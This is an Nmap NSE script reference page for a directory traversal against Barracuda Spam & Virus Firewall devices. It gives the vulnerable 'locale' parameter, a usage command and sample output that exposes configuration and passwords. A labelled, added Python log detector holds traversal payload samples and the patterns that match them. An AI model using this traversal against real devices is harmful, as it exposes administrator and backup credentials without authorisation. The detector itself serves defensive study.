http-barracuda-dir-traversal
Script type:
portrule
Script categories:
intrusive, exploit, auth
Script download: http://nmap.org/svn/scripts/http-barracuda-dir-traversal.nse
Attempts to retrieve the configuration settings from a Barracuda Networks Spam & Virus Firewall device using the directory traversal vulnerability described at http://seclists.org/fulldisclosure/2010/Oct/119.
This vulnerability is in the "locale" parameter of "/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.
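As an added, defender-side example that is not part of the NSE script or of Nmap: a Python check that flags web-server log entries hitting either view_help.cgi path with a "locale" value containing a parent-directory step, including single- and double-percent-encoded forms. The log format, client addresses and target paths are constructed for illustration.

```python
"""Flag access-log entries that look like the view_help.cgi 'locale' traversal."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined-log style; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Oct/2010:10:00:01 -0500] "GET /cgi-mod/view_help.cgi?locale=en_US HTTP/1.1" 200 5120
10.0.0.9 - - [12/Oct/2010:10:00:07 -0500] "GET /cgi-mod/view_help.cgi?locale=../../../constructed/target HTTP/1.1" 200 81920
10.0.0.9 - - [12/Oct/2010:10:00:09 -0500] "GET /cgi-bin/view_help.cgi?locale=..%252f..%252fconstructed%252ftarget HTTP/1.1" 200 81920
10.0.0.7 - - [12/Oct/2010:10:00:11 -0500] "GET /cgi-mod/index.cgi?locale=../x HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# The two request paths named in the advisory.
VULN_PATHS = {"/cgi-mod/view_help.cgi", "/cgi-bin/view_help.cgi"}


def fully_decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so ..%2f and ..%252f both normalise."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(target):
    """True if the request targets view_help.cgi with a 'locale' containing a parent-directory step."""
    parts = urlsplit(target)
    if parts.path not in VULN_PATHS:
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        normalised = fully_decode(value).replace("\\", "/")
        if "../" in normalised or normalised.endswith(".."):
            return True
    return False


def find_traversal_attempts(log_text):
    """Return (client_ip, timestamp, status, raw_target) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_traversal_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), int(m.group("status")), m.group("target")))
    return hits


if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print("traversal attempt:", *hit)
```

A 200 status on a flagged request is the signal worth escalating, since the script described here succeeds only when the traversed read is served.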
Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou <Shadow@SquatThis.net>
For more information, see:
http://seclists.org/fulldisclosure/2010/Oct/119
http://www.exploit-db.com/exploits/15130/
Script argument http-max-cache-size sets the maximum cache size. The default value is 100,000. Barracuda configuration files vary in size mostly with the number of users; a maximum cache size of 5,000,000 bytes should be enough for configuration files covering up to 5,000 users.
Usage
nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p <port> <host>
Sample output:
PORT     STATE SERVICE REASON
8000/tcp open  http    syn-ack Barracuda Spam firewall http config
| http-barracuda-dir-traversal:
| Users: 256
| Device: Barracuda Spam Firewall
| Version: 4.1.0.0
| Hostname: barracuda
| Domain: example.com
| Timezone: America/Chicago
| Language: en_US
| Password: 123456
| API Password: 123456
| MTA SASL LDAP Password: 123456
| Gateway: 192.168.1.1
| Primary DNS: 192.168.1.2
| Secondary DNS: 192.168.1.3
| DNS Cache: No
| Backup Server: ftp.example.com
| Backup Port: 21
| Backup Type: ftp
| Backup Username: user
| Backup Password: 123456
| NTP Enabled: Yes
| NTP Server: update01.barracudanetworks.com
| SSH Enabled: Yes
| BRTS Enabled: No
| BRTS Server: fp.bl.barracudanetworks.com
| HTTP Port: 8000
| HTTP Disabled: No
| HTTPS Port: 443
| HTTPS Only: No
|
| Vulnerable to directory traversal vulnerability:
|_http://seclists.org/fulldisclosure/2010/Oct/119
Author: Brendan Coles
License: compiled by VER007 http://www.ver007.com